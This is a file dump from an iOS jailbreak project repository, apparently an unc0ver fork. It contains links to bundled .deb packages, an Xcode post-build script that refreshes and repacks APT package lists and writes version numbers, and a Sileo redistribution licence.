/apt/libtasn1_4.13-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libtasn1_4.13-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/libunistring_0.9.10-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/libunistring_0.9.10-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/lz4_1.7.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/lz4_1.7.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/lzma_5.2.4-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/lzma_5.2.4-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/mobilesubstrate_0.9.7033_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/mobilesubstrate_0.9.7033_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ncurses5-libs_5.9-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ncurses5-libs_5.9-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/ncurses_6.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/ncurses_6.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/nettle_3.4.1-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/nettle_3.4.1-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/npth_1.6-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/npth_1.6-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/openssh_7.9p1-3_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/openssh_7.9p1-3_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/org.coolstar.sileo_1.0.8_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/org.coolstar.sileo_1.0.8_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/org.thebigboss.repo.icons_1.0_all.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/org.thebigboss.repo.icons_1.0_all.deb
--------------------------------------------------------------------------------
/apt/p11-kit_0.23.12-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/p11-kit_0.23.12-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/profile.d_0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/profile.d_0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/readline_8.0-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/readline_8.0-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/rsync_3.1.3-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/rsync_3.1.3-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/sed_4.5-1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/sed_4.5-1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/shell-cmds_118-8_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/shell-cmds_118-8_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/signing-certificate_0.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/signing-certificate_0.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/system-cmds_790.30.1-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/system-cmds_790.30.1-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/system-memory-reset-fix_1.0_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/system-memory-reset-fix_1.0_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/tar_1.30-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/tar_1.30-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/trustinjector_0.4~b5_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/trustinjector_0.4~b5_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/uikittools_2.0.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/uikittools_2.0.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/us.diatr.sileorespring_1.1_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/us.diatr.sileorespring_1.1_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/us.diatr.sillyo_1.4_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/us.diatr.sillyo_1.4_iphoneos-arm.deb
--------------------------------------------------------------------------------
/apt/wget_1.19.5-2_iphoneos-arm.deb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/apt/wget_1.19.5-2_iphoneos-arm.deb
--------------------------------------------------------------------------------
/post.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | # Get path for dpkg
3 |
4 | if [ -f ~/.profile ]; then
5 | . ~/.profile
6 | fi
7 |
8 | # 'set -e' has to be included after (and not before!) .profile's logic or else this happens:
9 | # /Users/travis/.travis/functions: line 221: syntax error near unexpected token `<'
10 | # /Users/travis/.travis/functions: line 221: ` done < <('
11 | set -e
12 |
13 | echo Using Source Root: ${SOURCE_ROOT}
14 |
15 | if [[ "${CODE_SIGNING_REQUIRED}" == "NO" ]]; then
16 | if which -s gtar; then
17 | TAR=gtar
18 | elif which -s gnutar; then
19 | TAR=gnutar
20 | else
21 | TAR=tar
22 | fi
23 |
24 | LISTSRC="${SOURCE_ROOT}/Undecimus/resources/lists.tar.lzma"
25 | pushd "${TEMP_DIR}"
26 | rm -rf lists
27 | mkdir lists
28 | pushd lists
29 | ${TAR} xf "${LISTSRC}"
30 | cp -a ../lists ../lists-packaged
31 | CURLARGS=("-H" "X-Firmware: 11.0" "-H" "X-Machine: iPhone0,0" "-H" "X-Unique-ID: 42" "-H" "User-Agent: Telesphoreo APT-HTTP/1.0.592")
32 | for file in $(ls); do
33 | echo ${file}
34 | tfile="${file}"
35 | if [[ "${file%_Packages}" != "${file}" ]]; then
36 | file="${file}.bz2"
37 | fi
38 | HTTPURL="http://${file//_//}"
39 | HTTPSURL="https://${file//_//}"
40 | if ! curl "${CURLARGS[@]}" -z ${tfile} -o "${file}" ${HTTPSURL} 2>/dev/null; then
41 | curl "${CURLARGS[@]}" -z ${tfile} -o ${file} ${HTTPURL} 2>/dev/null
42 | fi
43 | if [[ -f "${file}" && "${file%.bz2}" != "${file}" ]]; then
44 | if [ -f "${tfile}" ]; then
45 | rm "${tfile}"
46 | fi
47 | bunzip2 "${file}"
48 | fi
49 | done
50 | if diff -qr ../lists-packaged . > /dev/null; then
51 | echo Lists unchanged, continuing.
52 | else
53 | echo Lists updated, repacking. This will take a while...
54 | if ! ${TAR} --use-compress-program="lzma -e9" --owner=root --group=wheel -cf "${LISTSRC}" *; then
55 | echo We need GNU tar please
56 | exit 1
57 | fi
58 | echo Done.
59 | fi
60 | popd
61 | rm -rf lists lists-packaged
62 | popd
63 | fi # CODE_SIGNING_REQUIRED == NO
64 |
65 | rm -rf "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/apt"
66 | rm -f "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/"*.deb
67 | rsync -a "${SOURCE_ROOT}/apt" "${SOURCE_ROOT}/Undecimus/resources/"* "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/"
68 |
69 | pushd "${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/apt"
70 | dpkg-scanpackages . > Packages
71 | cd ..
72 | # Make sure these files exist and there is only one of them
73 | ln -s apt/jailbreak-resources_*.deb resources.deb
74 | popd
75 |
76 | RESOURCES_VERSION="$(dpkg --info ${TARGET_BUILD_DIR}/${CONTENTS_FOLDER_PATH}/resources.deb | grep Version: | awk '{print $2}')"
77 | if [ -z "${RESOURCES_VERSION}" ]; then
78 | echo "dpkg not found or resources.deb missing"
79 | exit 1
80 | else
81 | echo "Bundled resources: ${RESOURCES_VERSION}"
82 | fi
83 |
84 | PACKAGE_VERSION="$(git describe --tags --match="v*" | sed -e 's@-\([^-]*\)-\([^-]*\)$@+\1.\2@;s@^v@@;s@%@~@g')"
85 | if [ -z "${PACKAGE_VERSION}" ]; then
86 | echo "Could not generate package version"
87 | exit 1
88 | else
89 | echo "Package Version: ${PACKAGE_VERSION}"
90 | fi
91 |
92 | defaults write "${TARGET_BUILD_DIR}/${INFOPLIST_PATH}" BundledResources "${RESOURCES_VERSION}"
93 | defaults write "${TARGET_BUILD_DIR}/${INFOPLIST_PATH}" CFBundleShortVersionString "${PACKAGE_VERSION}"
94 |
--------------------------------------------------------------------------------
/sileolicense-u0dark.md:
--------------------------------------------------------------------------------
1 | # Sileo Binary Redistribution License
2 | Sileo is (C) 2019, the Sileo Project
3 |
4 | Sileo's source code is confidential and proprietary. It may not be read, copied or distributed without explicit permission of CoolStar. This license does not grant permission to use the Source code.
5 |
6 | Sileo binaries must be distributed free of charge, but are still copyrighted and may not be mirrored or cloned without permission from CoolStar
7 |
8 | # Sileo Binary Redistribution Grant
9 | This addendum grants official permission to "Shady" (also known as nqcshady on github) and "Diatrus" (also known as Diatrus on github) to redistribute Sileo 1.1.0 or higher and its dependencies as part of a jailbreak bootstrap, granted the following conditions are met.
10 |
11 | ### Modifications to Sileo and its dependencies
12 | Redistributors are not allowed to modify packages required by Sileo that are distributed under the Sileo license. These packages must be redistributed in their unmodified form, and clones may not be used.
13 |
14 | ### Paired dependencies
15 | A Sileo version is paired with a certain version of APT. For example, Sileo 1.0 to 1.2.5 (as of July 28th, 2019) are paired with APT 1.8. When each version of Sileo is released, it is effectively paired with the latest version of APT from the Electra/Chimera repo at the time. Users may mismatch Sileo and APT versions to some extent, however official redistributors are required to distribute the correct paired versions of Sileo and APT together.
16 |
17 | ### Other dependencies
18 | Sileo may require certain other closed source dependencies such as uikittools-ng. As stated in the previous clauses, redistributors are required to redistribute the official unmodified packages of these dependencies, so long as they are required to run Sileo
19 |
20 | ### Other software
21 | The official origin repo for Sileo may contain other closed source software under a different license. (E.g. Anemone 3). This license does not provide permission to redistribute the other software. However, the origin repo itself may be added to Sileo so users may continue to download the other software themselves from the origin repo
22 |
23 | ### Origin repo
24 | The origin repo is defined as the official repository that is run by CoolStar to distribute Sileo. As of July 28, 2019, there are 2 origin repos (the Electra and Chimera repos).
25 |
26 | ### Credit
27 | For this license to be valid, credit must be provided to the Sileo Team for Sileo itself, as well as credits for any of the required dependencies that are redistributed (e.g. CoolStar for uikittools-ng).
28 |
29 | ### License
30 | This redistribution grant is only valid when attached with a copy of the Sileo Binary Redistribution license. This grant along with the license must be included with the software distribution package that Sileo is bundled with, along with an official signature.
31 |
32 | ### Signing
33 | For this redistribution grant to be valid, a base64 encoding of an RSA signature (with SHA2-256 digest) signed with CoolStar's private key must be attached to the end of this license, signing the contents of both the license and the redistribution grant up until the period (.) after the date at the end of the redistribution grant that indicates the date that the license has been signed.
34 |
35 | The signature may be validated against the RSA public key at https://gist.github.com/coolstar/a8f4159993be234b24676cb0da5b7dcc to verify that this license is valid.
36 |
37 | 7/28/2019.
38 |
39 | AFAniwN8Un76F5owWZyO1oxiA7RPH0IFoo9QhnTjYvneqcPRoA87289QDpn6eqc2
40 | GZ4VPoDEZeyoU2PivKc1VQ==
--------------------------------------------------------------------------------